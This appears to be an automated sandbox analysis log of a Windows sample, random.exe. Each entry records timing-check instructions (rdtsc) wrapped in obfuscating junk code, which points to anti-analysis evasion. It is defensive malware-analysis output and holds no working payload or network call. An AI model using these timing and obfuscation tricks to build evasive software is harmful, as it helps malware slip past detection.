Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8710CE second address: 8710DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F3C150B7566h 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8710DB second address: 871103 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F3C153246DDh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86F8F8 second address: 86F8FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 871103 second address: 87110D instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3C153246D6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86F8FC second address: 86F906 instructions: 0x00000000 rdtsc 0x00000002 je 00007F3C150B7566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87110D second address: 87112B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F3C153246E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86F906 second address: 86F910 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3C150B756Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86F910 second address: 86F934 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007F3C153246E4h 0x0000000d push eax 0x0000000e push edx 0x0000000f js 00007F3C153246D6h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 82C69F second address: 82C6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 873025 second address: 873029 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8738FB second address: 8738FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8738FF second address: 873909 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 873909 second address: 87390D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 875604 second address: 87560A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87560A second address: 875618 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8747B9 second address: 8747DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007F3C153246E5h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8747DA second address: 8747DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8747DF second address: 8747F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C153246E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8747F7 second address: 8747FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8776C8 second address: 8776CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8776CE second address: 8776F1 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b mov bx, cx 0x0000000e push 00000000h 0x00000010 mov dword ptr [ebp+122D18CEh], eax 0x00000016 push 00000000h 0x00000018 mov bl, 31h 0x0000001a xchg eax, esi 0x0000001b push eax 0x0000001c push edx 0x0000001d pushad 0x0000001e pushad 0x0000001f popad 0x00000020 push edx 0x00000021 pop edx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8786CD second address: 8786E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jl 00007F3C153246E2h 0x0000000b jng 00007F3C153246DCh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87A642 second address: 87A646 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87A646 second address: 87A64C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87A64C second address: 87A652 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8797EA second address: 8797EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87A652 second address: 87A656 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87A656 second address: 87A70C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F3C153246E6h 0x0000000e nop 0x0000000f jc 00007F3C153246E1h 0x00000015 pushad 0x00000016 adc dl, FFFFFFA4h 0x00000019 jng 00007F3C153246D6h 0x0000001f popad 0x00000020 push 00000000h 0x00000022 jmp 00007F3C153246E8h 0x00000027 push 00000000h 0x00000029 push 00000000h 0x0000002b push eax 0x0000002c call 00007F3C153246D8h 0x00000031 pop eax 0x00000032 mov dword ptr [esp+04h], eax 0x00000036 add dword ptr [esp+04h], 0000001Ah 0x0000003e inc eax 0x0000003f push eax 0x00000040 ret 0x00000041 pop eax 0x00000042 ret 0x00000043 and ebx, dword ptr [ebp+122D2C38h] 0x00000049 jmp 00007F3C153246E7h 0x0000004e mov dword ptr [ebp+12455387h], edi 0x00000054 xchg eax, esi 0x00000055 pushad 0x00000056 js 00007F3C153246E0h 0x0000005c jmp 00007F3C153246DAh 0x00000061 push eax 0x00000062 push edx 0x00000063 jmp 00007F3C153246E0h 0x00000068 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87E736 second address: 87E741 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007F3C150B7566h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87F8DD second address: 87F8E7 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F3C153246D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87E93B second address: 87E9E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007F3C150B7568h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000019h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 xor ebx, dword ptr [ebp+1244CCB9h] 0x0000002d push dword ptr fs:[00000000h] 0x00000034 mov edi, dword ptr [ebp+122D1BBAh] 0x0000003a mov ebx, dword ptr [ebp+12471418h] 0x00000040 mov dword ptr fs:[00000000h], esp 0x00000047 cmc 0x00000048 mov eax, dword ptr [ebp+122D0685h] 0x0000004e push 00000000h 0x00000050 push ebx 0x00000051 call 00007F3C150B7568h 0x00000056 pop ebx 0x00000057 mov dword ptr [esp+04h], ebx 0x0000005b add dword ptr [esp+04h], 0000001Bh 0x00000063 inc ebx 0x00000064 push ebx 0x00000065 ret 0x00000066 pop ebx 0x00000067 ret 0x00000068 jmp 00007F3C150B7571h 0x0000006d push FFFFFFFFh 0x0000006f mov edi, dword ptr [ebp+122D1913h] 0x00000075 nop 0x00000076 push eax 0x00000077 push edx 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87E9E4 second address: 87E9E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 87E9E8 second address: 87E9FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B756Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 880955 second address: 88095B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 88095B second address: 880960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 88195C second address: 881960 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 889359 second address: 88935F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 88935F second address: 889367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 88965F second address: 88968C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jng 00007F3C150B7566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d jmp 00007F3C150B7571h 0x00000012 jmp 00007F3C150B756Ch 0x00000017 push ecx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 88F13E second address: 88F142 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 893CE1 second address: 893CE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 893CE5 second address: 893CEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 893CEB second address: 893CF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 893CF3 second address: 893CF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 894287 second address: 89428D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89428D second address: 8942A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C153246DDh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8942A3 second address: 8942A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8942A9 second address: 8942DF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007F3C153246DEh 0x0000000c popad 0x0000000d pushad 0x0000000e jl 00007F3C153246D8h 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007F3C153246E6h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8942DF second address: 8942FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B756Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c jno 00007F3C150B7566h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 894450 second address: 894454 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 894454 second address: 894460 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jne 00007F3C150B7566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 894460 second address: 89446B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 js 00007F3C153246D6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 894C47 second address: 894C64 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7579h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 894DD8 second address: 894DEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E0h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89C850 second address: 89C85A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F3C150B7566h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89CDF8 second address: 89CDFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89CDFC second address: 89CE2A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jo 00007F3C150B7566h 0x00000013 push esi 0x00000014 pop esi 0x00000015 popad 0x00000016 push eax 0x00000017 jmp 00007F3C150B7575h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89D265 second address: 89D26B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89D26B second address: 89D290 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7579h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F3C150B7566h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89D290 second address: 89D294 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89D42E second address: 89D43A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 js 00007F3C150B7566h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89D43A second address: 89D442 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89D442 second address: 89D446 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89D446 second address: 89D44A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8501EB second address: 850227 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F3C150B7566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b pushad 0x0000000c push edx 0x0000000d push esi 0x0000000e pop esi 0x0000000f jmp 00007F3C150B756Bh 0x00000014 pop edx 0x00000015 jmp 00007F3C150B7579h 0x0000001a push eax 0x0000001b push edx 0x0000001c jp 00007F3C150B7566h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 850227 second address: 85022B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89DA4F second address: 89DA53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89DA53 second address: 89DA78 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 ja 00007F3C153246D6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push edi 0x0000000d jmp 00007F3C153246E6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 89C36B second address: 89C36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A36E5 second address: 8A36FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F3C153246D6h 0x0000000a jmp 00007F3C153246E0h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A36FF second address: 8A3731 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3C150B7566h 0x00000008 jc 00007F3C150B7566h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 push eax 0x00000014 push ebx 0x00000015 pop ebx 0x00000016 jmp 00007F3C150B7578h 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A3731 second address: 8A374D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jns 00007F3C153246D6h 0x0000000d jmp 00007F3C153246DFh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A374D second address: 8A3758 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A3758 second address: 8A375E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A2963 second address: 8A296F instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F3C150B756Eh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A20C2 second address: 8A20E3 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F3C153246D6h 0x00000008 jmp 00007F3C153246E3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push ebx 0x00000010 push eax 0x00000011 pop eax 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A2E40 second address: 8A2E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A2E48 second address: 8A2E6B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F3C153246E9h 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A2E6B second address: 8A2E7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F3C150B7566h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A2E7A second address: 8A2E90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E2h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A302F second address: 8A3039 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A3039 second address: 8A3043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F3C153246D6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A3043 second address: 8A3049 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 820AD1 second address: 820AD5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A6C66 second address: 8A6C87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C150B7578h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A6C87 second address: 8A6C8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A6C8B second address: 8A6C8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8A6C8F second address: 8A6C95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 867257 second address: 8672A6 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F3C150B7568h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F3C150B7568h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000018h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 adc dh, FFFFFFD6h 0x00000028 lea eax, dword ptr [ebp+1247BF67h] 0x0000002e mov dword ptr [ebp+122D194Ah], ecx 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 jmp 00007F3C150B756Fh 0x0000003d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 86790A second address: 867934 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c jns 00007F3C153246DEh 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jno 00007F3C153246DCh 0x0000001c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 867CDD second address: 867D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 mov dword ptr [esp], eax 0x00000008 xor edi, dword ptr [ebp+122D199Bh] 0x0000000e push 00000004h 0x00000010 mov dh, 50h 0x00000012 nop 0x00000013 push edx 0x00000014 jne 00007F3C150B7568h 0x0000001a pop edx 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push eax 0x00000020 pop eax 0x00000021 pop eax 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 8680A2 second address: 8680FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F3C153246E6h 0x00000009 popad 0x0000000a pop edx 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edx 0x00000011 call 00007F3C153246D8h 0x00000016 pop edx 0x00000017 mov dword ptr [esp+04h], edx 0x0000001b add dword ptr [esp+04h], 0000001Dh 0x00000023 inc edx 0x00000024 push edx 0x00000025 ret 0x00000026 pop edx 0x00000027 ret 0x00000028 sub dword ptr [ebp+122D1891h], eax 0x0000002e push 0000001Eh 0x00000030 or edx, 786FD77Fh 0x00000036 nop 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
